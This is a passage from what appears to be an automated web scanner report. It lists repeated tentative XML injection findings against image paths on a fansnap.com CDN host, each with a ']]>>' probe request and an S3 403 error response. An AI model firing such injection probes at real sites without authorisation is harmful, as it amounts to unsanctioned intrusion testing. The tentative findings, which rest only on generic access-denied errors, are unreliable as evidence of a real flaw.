The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 69085058C5FCE758
x-amz-id-2: e+OBDc+G7WJaTzdcxYBqHcXlRH6WNVPu1PncfBe7CkVht3AHgJFSOTUkbXT396nH
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 62ed7f090a2d684ccb0d6659b0e0eedb3e47dfef185708566f10151e17cab2385b5a531a846f677c
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>69085058C5FCE758</RequestId><HostId>e+OBDc+G7WJaTzdcxYBqHcXlRH6WNVPu1PncfBe7CkVht3AHgJ
...[SNIP]...

8.186. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ffcc00-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E6FB1F88FD52B973
x-amz-id-2: dA2V2asFBjF+0Q11clc+7fv+QavPzXknvc0wV2mHFFwlHu4LEezULV5zIwr2hnHJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 369fa9fdc2aea250c2a356e8e676da18301ee799766608e03bd59ec889f9bb1d2dd9b1f2a8d35ef0
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E6FB1F88FD52B973</RequestId><HostId>dA2V2asFBjF+0Q11clc+7fv+QavPzXknvc0wV2mHFFwlHu4LEe
...[SNIP]...

8.187. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ffcc00-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A090C566E176FCEF
x-amz-id-2: 92jXgy3XHrsw0O1HKkgQ/AZTfVejgvMOFmrm9072gcpcJVGuuX5bQYIB7YXaFUXt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f89935bf25caa3acf7275a5964974e2c824cb0cf0dc984fbb83a55752fcb39adffafb50bb165a5d7
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A090C566E176FCEF</RequestId><HostId>92jXgy3XHrsw0O1HKkgQ/AZTfVejgvMOFmrm9072gcpcJVGuuX
...[SNIP]...

8.188. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ffcc00-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AC8F4BBCE4311DDC
x-amz-id-2: sFPVFRlORTnMx/NCSwGmleH77AEaBR1l8dDTLOF0w4Ddy5Z6fUrR2uxvjQ1du4Np
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c4f06f29fe2f520842c02a226d93bf131d0bbeb1a09f07f2e361e24cb2a1a6152ee7c7498c03667c
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AC8F4BBCE4311DDC</RequestId><HostId>sFPVFRlORTnMx/NCSwGmleH77AEaBR1l8dDTLOF0w4Ddy5Z6fU
...[SNIP]...

8.189. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3604CF1A9D03C6A8
x-amz-id-2: +jWDnAO18ZFtsIKZrduEQnZ/P4iG8bNceTX9euCf0WNyr9w+ns8uz4V9zmcyBifs
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:22 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f92cc838b293fde8bf4f9373215a654fc97039011c2f37de229b2102bff10b942e45bf19f2628e7c
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3604CF1A9D03C6A8</RequestId><HostId>+jWDnAO18ZFtsIKZrduEQnZ/P4iG8bNceTX9euCf0WNyr9w+ns
...[SNIP]...

8.190. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ffcc00-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 53B014E8A8A58624
x-amz-id-2: R9+N7YgHx9kSsD1cRNfYAFkp49V7RRqjteLOFyranPtaqJElMx1cCCrpKtlcEqIh
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2bb6560b6f01ea9e333467668c57f7b9ecf4e87d9426cdcbcdcb15517c9ff380b28e555cf62a50ad
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>53B014E8A8A58624</RequestId><HostId>R9+N7YgHx9kSsD1cRNfYAFkp49V7RRqjteLOFyranPtaqJElMx
...[SNIP]...

8.191. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ffcc00-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A846C283C0AA42E8
x-amz-id-2: CS7O1W+pwYWGe5D2Jjsd4e3E+67acQafxFoQcah8bGl/ynX7KSDGFU5HBnzC90lb
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9324c947c1392e2ab9fa576e4c59392f16c7fc4c9367431ec414c72b40a7ff36f4afe0f06ef61594
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A846C283C0AA42E8</RequestId><HostId>CS7O1W+pwYWGe5D2Jjsd4e3E+67acQafxFoQcah8bGl/ynX7KS
...[SNIP]...

8.192. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ffcc00-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AC420AA6DFBB991B
x-amz-id-2: kh8O3z9vQKNCQDUcdomTL5WR8Flvmw2Vnhg09QLwIAt1PrqPkf7KB3Zi0lasOCEA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 70a3e5d3cf2474c0253e0888553a080438b19589b25fae04b8fa2ef07170ee95e0ac052dcc0521a1
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AC420AA6DFBB991B</RequestId><HostId>kh8O3z9vQKNCQDUcdomTL5WR8Flvmw2Vnhg09QLwIAt1PrqPkf
...[SNIP]...

8.193. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D94C908C5BF08D99
x-amz-id-2: oj+v2W1SP9VbOZMM3LpTl43B8venpGXO6otpgtkY9Y//dyEzGZlCsjzdI4Z8vk4E
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5a7824efe1d24d19d5cb4be16869655839681744080ebcd4fbea886533c2fb15ddbf7d083df57ca0
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D94C908C5BF08D99</RequestId><HostId>oj+v2W1SP9VbOZMM3LpTl43B8venpGXO6otpgtkY9Y//dyEzGZ
...[SNIP]...

8.194. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ffcc00-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 801F152A128E184A
x-amz-id-2: jA3IGj/IZsxEgep4YGYQwb0B6Tk5DtwT+sBmD83m/wL816qjb0IXl/qVJDjFeoGC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:59 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1d88c0a1c9eb55e3a68967e84db831211de654e91bf043220721abe601ab6fdcbff64827e5074ba5
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>801F152A128E184A</RequestId><HostId>jA3IGj/IZsxEgep4YGYQwb0B6Tk5DtwT+sBmD83m/wL816qjb0
...[SNIP]...

8.195. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ffcc00-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BBDC441DB4F738F4
x-amz-id-2: dPlwAWdCoJsw8l3GYymnbxH8vkvnkwyDJxgRvFTjMsbVfOTsVTNG+NhVYpwTampl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:11 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 850749d8e84f630eab8b2d236df0d867a3fc92df4a3e8a21f3c6ce9f4a1e90458838898f0bae2d4f
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BBDC441DB4F738F4</RequestId><HostId>dPlwAWdCoJsw8l3GYymnbxH8vkvnkwyDJxgRvFTjMsbVfOTsVT
...[SNIP]...

8.196. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ffcc00-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B175044940F91731
x-amz-id-2: eN2HN41dr1eNBESlZXC1lzafeaa7yo+O+4+cQHv1zZhFPjrBq5eSXUA1RWz9iRKt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:17 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 604efd9ebe16746d6c7b51412696f5bf242fe237f4b730576bed6fad4afbc4cd655fa581ae24f8c2
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B175044940F91731</RequestId><HostId>eN2HN41dr1eNBESlZXC1lzafeaa7yo+O+4+cQHv1zZhFPjrBq5
...[SNIP]...

8.197. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 383633FD94770639
x-amz-id-2: SEjkgS7ipwBVX0jJmGS3wtGAUM6WVuAfGB+VN4/KQ/VneUx2ELe/wxKPVKv/NBPK
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2194d0670f0789d1c1bce9e8f6344e97d9673975182558d3ec6f325efc6ac874afbf67bd414d31d1
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>383633FD94770639</RequestId><HostId>SEjkgS7ipwBVX0jJmGS3wtGAUM6WVuAfGB+VN4/KQ/VneUx2EL
...[SNIP]...

8.198. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/progressBar_all.gif

Issue detail

